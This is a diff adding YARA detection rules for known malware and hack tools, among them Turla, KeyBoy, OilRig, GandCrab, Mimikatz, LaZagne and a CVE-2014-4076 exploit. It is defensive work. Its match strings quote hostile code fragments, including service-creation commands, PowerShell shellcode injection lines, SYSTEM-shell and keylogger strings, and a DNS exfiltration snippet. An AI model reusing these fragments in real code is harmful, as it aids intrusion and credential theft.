+      hash2 = "77cbd7252a20f2d35db4f330b9c4b8aa7501349bc06bbcc8f40ae13d01ae7f8f"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "sc %s create %s binPath= \"cmd.exe /c start %%SystemRoot%%\\%s\">>%s" fullword ascii
+      $x2 = "cmd.exe /c start %%SystemRoot%%\\%s" fullword ascii
+      $x3 = "cmd.exe /c %s\\%s -s %s:%s:%s -c \"%s %s /wait 1\">>%s" fullword ascii
+      $x4 = "Read InjectLog[%dB]********************************" fullword ascii
+      $x5 = "%s\\System32\\011fe-3420f-ff0ea-ff0ea.tmp" fullword ascii
+      $x6 = "**************************** Begin ini %s [%d]***********************************************" fullword ascii
+      $x7 = "%s -o %s -i %s -d exec2 -f %s" fullword ascii
+      $x8 = "Logon to %s failed: code %d(User:%s,Pass:%s)" fullword ascii
+      $x9 = "system32\\dxsnd32x.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
+}
+
+rule SUSP_Bad_PDF_RID2AFB : DEMO FILE SUSP {
+   meta:
+      description = "Detects PDF that embeds code to steal NTLM hashes"
+      author = "Florian Roth, Markus Neis"
+      reference = "Internal Research"
+      date = "2018-05-03 08:47:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d8c502da8a2b8d1c67cb5d61428f273e989424f319cfe805541304bdb7b921a8"
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "         /F (http//" ascii
+      $s2 = "        /F (\\\\\\\\" ascii
+      $s3 = "<</F (\\\\" ascii
+   condition: 
+      ( uint32 ( 0 ) == 0x46445025 or uint32 ( 0 ) == 0x4450250a ) and 1 of them
+}
+
+rule MAL_Hogfish_Report_Related_Sample_RID33CE : APT CHINA DEMO EXE FILE G0045 MAL {
+   meta:
+      description = "Detects APT10 / Hogfish related samples"
+      author = "Florian Roth"
+      reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
+      date = "2018-05-01 15:03:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f9acc706d7bec10f88f9cfbbdf80df0d85331bd4c3c0188e4d002d6929fe4eac"
+      hash2 = "7188f76ca5fbc6e57d23ba97655b293d5356933e2ab5261e423b3f205fe305ee"
+      hash3 = "4de5a22cd798950a69318fdcc1ec59e9a456b4e572c2d3ac4788ee96a4070262"
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0045, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "R=user32.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or 1 of them )
+}
+
+rule MAL_RedLeaves_Apr18_1_RID2E40 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects RedLeaves malware"
+      author = "Florian Roth"
+      reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
+      date = "2018-05-01 11:06:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f6449e255bc1a9d4a02391be35d0dd37def19b7e20cfcc274427a0b39cb21b7b"
+      hash2 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d"
+      hash3 = "d956e2ff1b22ccee2c5d9819128103d4c31ecefde3ce463a6dea19ecaaf418a1"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "566a7a4ef613a797389b570f8b4f79df" )
+}
+
+rule MAL_GandCrab_Apr18_1_RID2DB7 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects GandCrab malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/MarceloRivero/status/988455516094550017"
+      date = "2018-04-23 10:43:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6fafe7bb56fd2696f2243fc305fe0c38f550dffcfc5fca04f70398880570ffff"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "7936b0e9491fd747bf2675a7ec8af8ba"
+}
+
+rule ProcessInjector_Gen_RID2EA7 : DEMO EXE GEN HIGHVOL HKTL {
+   meta:
+      description = "Detects a process injection utility that can be used ofr good and bad purposes"
+      author = "Florian Roth"
+      reference = "https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c"
+      date = "2018-04-23 11:23:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d"
+      tags = "DEMO, EXE, GEN, HIGHVOL, HKTL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "Error injecting remote thread in process:" fullword ascii
+      $s5 = "[-] Error getting access to process: %ld!" fullword ascii
+      $s6 = "--process-name <name>  Process name to inject" fullword ascii
+      $s12 = "No injection target has been provided!" fullword ascii
+      $s17 = "[-] An app path is required when not injecting!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and ( pe.imphash ( ) == "d27e0fa013d7ae41be12aaf221e41f9b" or 1 of them ) or 3 of them
+}
+
+rule MAL_WebMonitor_RAT_RID2D96 : DEMO EXE FILE MAL T1047 T1057 {
+   meta:
+      description = "Detects WebMonitor RAT"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
+      date = "2018-04-13 10:38:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "27aaad8a7b3fd53d99077a9202e8bed05696c843ed2485bea6eb9e33a1c273ac"
+      hash2 = "05111c305028b5d822ecd12de9879560223c42860cc9d448c47886c236648607"
+      tags = "DEMO, EXE, FILE, MAL, T1047, T1057"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "send_keylog_stream_start" fullword wide
+      $x2 = "KEYLOG_STREAM_STOP" fullword wide
+      $s1 = "SHELL_EXEC" fullword wide
+      $s2 = "send_shell_exec" fullword wide
+      $s3 = "send_connections_get" fullword wide
+      $a1 = "Select * from Win32_PerfRawData_PerfProc_Process where IDProcess = '" fullword wide
+      $a2 = "Select * from Win32_Process WHERE handle =" fullword wide
+      $a3 = "Select * from Win32_Process where ProcessId=" fullword wide
+      $a4 = "Select * from Win32_ComputerSystem" fullword wide
+      $a5 = "The service is in the process of being continued" fullword wide
+      $a6 = "tcpdump" fullword wide
+      $a7 = "memdump" fullword wide
+      $a8 = "<val1>Processor</val1>" fullword wide
+      $a9 = "Win32 share process" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or ( 2 of ( $s* ) and 2 of ( $a* ) ) or 7 of them )
+}
+
+rule WINNTI_KingSoft_Moz_Confustion_RID328A : CHINA DEMO EXE FILE G0044 MAL {
+   meta:
+      description = "Detects Barium sample with Copyright confusion"
+      author = "Markus Neis"
+      reference = "https://www.virustotal.com/en/file/070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496/analysis/"
+      date = "2018-04-13 14:09:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496"
+      tags = "CHINA, DEMO, EXE, FILE, G0044, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "7f01b23ccfd1017249c36bc1618d6892" or ( pe.version_info [ "LegalCopyright" ] contains "Mozilla Corporation" and pe.version_info [ "ProductName" ] contains "Kingsoft" ) )
+}
+
+rule MAL_Turla_Agent_BTZ_RID2DEF : DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects Turla Agent.BTZ"
+      author = "Florian Roth"
+      reference = "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified"
+      date = "2018-04-12 10:53:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
+      $x3 = "mstotreg.dat" fullword ascii
+      $x4 = "Bisuninst.bin" fullword ascii
+      $x5 = "mfc42l00.pdb" fullword ascii
+      $x6 = "ielocal~f.tmp" fullword ascii
+      $s1 = "%s\\1.txt" fullword ascii
+      $s2 = "%windows%" fullword ascii
+      $s3 = "%s\\system32" fullword ascii
+      $s4 = "\\Help\\SYSTEM32\\" ascii
+      $s5 = "%windows%\\mfc42l00.pdb" ascii
+      $s6 = "Size of log(%dB) is too big, stop write." fullword ascii
+      $s7 = "Log: Size of log(%dB) is too big, stop write." fullword ascii
+      $s8 = "%02d.%02d.%04d Log begin:" fullword ascii
+      $s9 = "\\system32\\win.com" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
+}
+
+rule Turla_KazuarRAT_RID2CCD : DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects Turla Kazuar RAT described by DrunkBinary"
+      author = "Markus Neis"
+      reference = "https://twitter.com/DrunkBinary/status/982969891975319553"
+      date = "2018-04-08 10:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6b5d9fca6f49a044fd94c816e258bf50b1e90305d7dab2e0480349e80ed2a0fa"
+      hash2 = "743b3347dc86b4a4aa6510648076eeca9eec0ff23c1294b3931263c990bcb5e6"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "~1.EXE" wide
+      $s2 = "dl32.dll" fullword ascii
+      $s3 = "HookProc@" ascii
+      $s4 = "0`.wtf" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "682156c4380c216ff8cb766a2f2e8817" or 2 of them )
+}
+
+rule SUSP_Imphash_PassRevealer_PY_EXE_RID32FA : DEMO EXE FILE HKTL SCRIPT SUSP T1003 {
+   meta:
+      description = "Detects an imphash used by password revealer and hack tools (some false positives with hardware driver installers)"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-04-06 14:28:11"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-11-09"
+      hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
+      tags = "DEMO, EXE, FILE, HKTL, SCRIPT, SUSP, T1003"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $fp1 = "Assmann Electronic GmbH" ascii wide
+      $fp2 = "Oculus VR" ascii wide
+      $fp3 = "efm8load" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 10000KB and pe.imphash ( ) == "ed61beebc8d019dd9bec823e2d694afd" and not 1 of ( $fp* )
+}
+
+rule MAL_Unknown_PWDumper_Apr18_3_RID312A : DEMO EXE FILE HKTL MAL {
+   meta:
+      description = "Detects sample from unknown sample set - IL origin"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-04-06 13:10:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d435e7b6f040a186efeadb87dd6d9a14e038921dc8b8658026a90ae94b4c8b05"
+      hash2 = "8c35c71838f34f7f7a40bf06e1d2e14d58d9106e6d4e6f6e9af732511a126276"
+      tags = "DEMO, EXE, FILE, HKTL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "loaderx86.dll" fullword ascii
+      $s2 = "tcpsvcs.exe" fullword wide
+      $s3 = "%Program Files, Common FOLDER%" fullword wide
+      $s4 = "%AllUsers, ApplicationData FOLDER%" fullword wide
+      $s5 = "loaderx86" fullword ascii
+      $s6 = "TNtDllHook$" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+}
+
+rule CVE_2014_4076_Exploitcode_RID2F24 : CVE_2014_4076 DEMO EXE EXPLOIT FILE T1068 {
+   meta:
+      description = "Detects an exploit code for CVE-2014-4076"
+      author = "Florian Roth"
+      reference = "https://github.com/Neo23x0/yarGen"
+      date = "2018-04-04 11:44:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "44690af85efef2db04c7e8cba7ca0d0e53be1a1432a339570a7d26eec860b8ee"
+      tags = "CVE_2014_4076, DEMO, EXE, EXPLOIT, FILE, T1068"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] Created a new cmd.exe process" fullword ascii
+      $x2 = "[+] Modified shellcode" fullword ascii
+      $x3 = "[*] Spawning SYSTEM shell..." fullword ascii
+      $x4 = "[*] MS14-070 (CVE-2014-4076) x86" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+}
+
+rule PowerShell_JAB_B64_RID2D4D : DEMO SCRIPT SUSP T1059_001 T1086 T1132 {
+   meta:
+      description = "Detects base464 encoded $ sign at the beginning of a string"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ItsReallyNick/status/980915287922040832"
+      date = "2018-04-02 10:26:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-01-14"
+      type = "file"
+      tags = "DEMO, SCRIPT, SUSP, T1059_001, T1086, T1132"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "('JAB" ascii wide
+      $s2 = "powershell" nocase
+   condition: 
+      filesize < 30KB and all of them
+}
+
+rule SUSP_PowerShell_String_K32_RemProcess_RID3507 : DEMO FILE SCRIPT SUSP T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects suspicious PowerShell code that uses Kernel32, RemoteProccess handles or shellcode"
+      author = "Florian Roth"
+      reference = "https://github.com/nccgroup/redsnarf"
+      date = "2018-03-31 15:55:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash3 = "54a8dd78ec4798cf034c7765d8b2adfada59ac34d019e77af36dcaed1db18912"
+      tags = "DEMO, FILE, SCRIPT, SUSP, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Throw \"Unable to allocate memory in the remote process for shellcode\"" fullword ascii
+      $x2 = "$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")" fullword ascii
+      $s3 = "$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants." ascii
+      $s7 = "if ($RemoteProcHandle -eq [IntPtr]::Zero)" fullword ascii
+      $s8 = "if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))" fullword ascii
+      $s9 = "$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, " ascii
+      $s15 = "$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x7566 and filesize < 6000KB and 1 of them
+}
+
+rule KeyBoy_InstallClient_RID2EF9 : APT DEMO EXE FILE G0081 T1085 T1197 {
+   meta:
+      description = "Detects KeyBoy InstallClient"
+      author = "Markus Neis, Florian Roth"
+      reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+      date = "2018-03-26 11:37:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "85d32cb3ae046a38254b953a00b37bb87047ec435edb0ce359a867447ee30f8b"
+      hash2 = "b0f120b11f727f197353bc2c98d606ed08a06f14a1c012d3db6fe0a812df528a"
+      hash1 = "85d32cb3ae046a38254b953a00b37bb87047ec435edb0ce359a867447ee30f8b"
+      tags = "APT, DEMO, EXE, FILE, G0081, T1085, T1197"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "egsvr32.exe \"/u bitsadmin /canceft\\windows\\currebitsadmin" ascii
+      $x2 = "/addfibitsadmin /Resumbitsadmin /SetNosoftware\\microsotifyCmdLine " ascii
+      $x3 = "D:\\Work\\Project\\VS\\house\\Apple\\" ascii
+      $x4 = "Bj+I11T6z9HFMG5Z5FMT/u62z9zw8FyWV0xrcK7HcYXkiqnAy5tc/iJuKtwM8CT3sFNuQu8xDZQGSR6D8/Bc/Dpuz8gMJFz+IrYqNAzwuPIitg==" fullword ascii
+      $x5 = "szCmd1:%s" fullword ascii
+      $s1 = "cmd.exe /c \"%s\"" fullword ascii
+      $s4 = "rundll32.exe %s Main" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule KeyBoy_wab32res_RID2CAC : APT DEMO EXE FILE G0081 T1197 {
+   meta:
+      description = "Detects KeyBoy Loader wab32res.dll"
+      author = "Markus Neis, Florian Roth"
+      reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+      date = "2018-03-26 09:59:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "02281e26e89b61d84e2df66a0eeb729c5babd94607b1422505cd388843dd5456"
+      hash2 = "fb9c9cbf6925de8c7b6ce8e7a8d5290e628be0b82a58f3e968426c0f734f38f6"
+      tags = "APT, DEMO, EXE, FILE, G0081, T1197"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "B4490-2314-55C1- /Processid:{321bitsadmin /canceft\\windows\\curresoftware\\microso" fullword ascii
+      $x2 = "D:\\Work\\VS\\House\\TSSL\\TSSL\\TClient" ascii
+      $x3 = "\\Release\\FakeRun.pdb" ascii
+      $x4 = "FakeRun.dll" fullword ascii
+      $s1 = "cmd.exe /c \"%s\"" fullword ascii
+      $s2 = "CreateProcess failed (%d)" fullword ascii
+      $s3 = "CreateProcess %s " fullword ascii
+      $s4 = "FindResource %s error " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of them )
+}
+
+rule KeyBoy_rasauto_RID2CC2 : APT DEMO EXE FILE G0081 T1085 {
+   meta:
+      description = "Detects KeyBoy ServiceClient"
+      author = "Markus Neis, Florian Roth"
+      reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+      date = "2018-03-26 10:02:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "49df4fec76a0ffaee5e4d933a734126c1a7b32d1c9cb5ab22a868e8bfc653245"
+      tags = "APT, DEMO, EXE, FILE, G0081, T1085"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $x1 = "rundll32.exe %s SSSS & exit" fullword ascii
+      $x2 = "D:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode _2\\Release\\ServiceClient.pdb" fullword ascii
+      $s1 = "cmd.exe /c \"%s\"" fullword ascii
+      $s2 = "CreateProcess failed (%d)" fullword ascii
+      $s3 = "ServiceClient.dll" fullword ascii
+      $s4 = "NtWow64QueryInformationProcess64 failed" fullword ascii
+      $s5 = "pid:%d CmdLine:%S" fullword ascii
+      $s6 = "rasauto32.ServiceMain" fullword ascii
+      $s7 = "del /q/f %s\\%s*" fullword ascii
+      $s8 = "szTmpDll:%s" fullword ascii
+      $s9 = "lpCmdLine:%s" fullword ascii
+      $s0 = "ReleaseFileFromRes:%s ok!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "SSSS" ) or 1 of ( $x* ) or 4 of them )
+}
+
+rule KeyBoy_876_0x4e20000_RID2CFA : APT DEMO EXE FILE G0081 MAL T1085 {
+   meta:
+      description = "Detects KeyBoy Backdoor"
+      author = "Markus Neis, Florian Roth"
+      reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+      date = "2018-03-26 10:12:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6e900e5b6dc4f21a004c5b5908c81f055db0d7026b3c5e105708586f85d3e334"
+      tags = "APT, DEMO, EXE, FILE, G0081, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%s\\rundll32.exe %s ServiceTake %s %s" fullword ascii
+      $x2 = "#%sCmd shell is not running,or your cmd is error!" fullword ascii
+      $x3 = "Take Screen Error,May no user login!" fullword ascii
+      $x4 = "Get logon user fail!" fullword ascii
+      $x5 = "8. LoginPasswd:%s" fullword ascii
+      $x6 = "Take Screen Error,service dll not exists" fullword ascii
+      $s1 = "taskkill /f /pid %s" fullword ascii
+      $s2 = "TClient.exe" fullword ascii
+      $s3 = "%s\\wab32res.dll" fullword ascii
+      $s4 = "%s\\rasauto.dll" fullword ascii
+      $s5 = "Download file:%s index:%d" fullword ascii
+      $s6 = "LogonUser: [%s]" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule Lazagne_PW_Dumper_RID2DA5 : DEMO HKTL T1003 {
+   meta:
+      description = "Detects Lazagne PW Dumper"
+      author = "Markus Neis, Florian Roth"
+      reference = "https://github.com/AlessandroZ/LaZagne/releases/"
+      date = "2018-03-22 10:40:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Crypto.Hash" fullword ascii
+      $s2 = "laZagne" fullword ascii
+      $s3 = "impacket.winregistry" fullword ascii
+   condition: 
+      3 of them
+}
+
+rule Chafer_Mimikatz_Custom_RID2FD9 : APT DEMO EXE FILE G0087 MIDDLE_EAST S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Detects Custom Mimikatz Version"
+      author = "Florian Roth, Markus Neis"
+      reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+      date = "2018-03-22 12:14:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9709afeb76532566ee3029ecffc76df970a60813bcac863080cc952ad512b023"
+      tags = "APT, DEMO, EXE, FILE, G0087, MIDDLE_EAST, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Users\\win7p\\Documents\\mi-back\\" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+}
+
+rule Chafer_Exploit_Copyright_2017_RID31DF : APT DEMO EXE EXPLOIT FILE G0049 G0087 MIDDLE_EAST {
+   meta:
+      description = "Detects Oilrig Internet Server Extension with Copyright (C) 2017 Exploit"
+      author = "Markus Neis"
+      reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+      date = "2018-03-22 13:41:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cdac69caad8891c5e1b8eabe598c869674dee30af448ce4e801a90eb79973c66"
+      tags = "APT, DEMO, EXE, EXPLOIT, FILE, G0049, G0087, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "test3 Internet Server Extension" fullword wide
+      $x2 = "Copyright (C) 2017 Exploit" fullword wide
+      $a1 = "popen() failed!" fullword ascii
+      $a2 = "cmd2cmd=" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or all of ( $a* ) )
+}
+
+rule Oilrig_Myrtille_RID2D28 : APT DEMO EXE FILE G0049 MIDDLE_EAST T1076 {
+   meta:
+      description = "Detects Oilrig Myrtille RDP Browser"
+      author = "Markus Neis"
+      reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+      date = "2018-03-22 10:19:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "67945f2e65a4a53e2339bd361652c6663fe25060888f18e681418e313d1292ca"
+      tags = "APT, DEMO, EXE, FILE, G0049, MIDDLE_EAST, T1076"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\obj\\Release\\Myrtille.Services.pdb" ascii
+      $x2 = "Failed to notify rdp client process exit (MyrtilleAppPool down?), remote session {0} ({1})" fullword wide
+      $x3 = "Started rdp client process, remote session {0}" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
+}
+
+rule Chafer_Packed_Mimikatz_RID2FA6 : APT DEMO EXE FILE G0049 G0087 MIDDLE_EAST S0002 T1003 T1045 T1075 T1097 T1178 {
+   meta:
+      description = "Detects Oilrig Packed Mimikatz also detected as Chafer_WSC_x64 by FR"
+      author = "Florian Roth, Markus Neis"
+      reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+      date = "2018-03-22 12:06:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5f2c3b5a08bda50cca6385ba7d84875973843885efebaff6a482a38b3cb23a7c"
+      tags = "APT, DEMO, EXE, FILE, G0049, G0087, MIDDLE_EAST, S0002, T1003, T1045, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Windows Security Credentials" fullword wide
+      $s2 = "Minisoft" fullword wide
+      $x1 = "Copyright (c) 2014 - 2015 Minisoft" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( all of ( $s* ) or $x1 )
+}
+
+rule Oilrig_PS_CnC_RID2BCC : APT DEMO G0049 MIDDLE_EAST SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Powershell CnC using DNS queries"
+      author = "Markus Neis"
+      reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
+      date = "2018-03-22 09:21:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9198c29a26f9c55317b4a7a722bf084036e93a41ba4466cbb61ea23d21289cfa"
+      tags = "APT, DEMO, G0049, MIDDLE_EAST, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "(-join $base32filedata[$uploadedCompleteSize..$($uploadedCompleteSize" fullword ascii
+      $s2 = "$hostname = \"D\" + $fileID + (-join ((65..90) + (48..57) + (97..122)|" ascii
+   condition: 
+      filesize < 40KB and 1 of them
+}
+
+rule TA18_074A_screen_RID2C29 : APT DEMO EXE FILE MAL T1113 {
+   meta:
+      description = "Detects malware mentioned in TA18-074A"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
+      date = "2018-03-16 09:37:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1113"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "screen.exe" fullword wide
+      $s2 = "PlatformInvokeUSER32" fullword ascii
+      $s3 = "GetDesktopImageF" fullword ascii
+      $s4 = "PlatformInvokeGDI32" fullword ascii
+      $s5 = "Too many arguments, going to store in current dir" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 60KB and 3 of them
+}
+
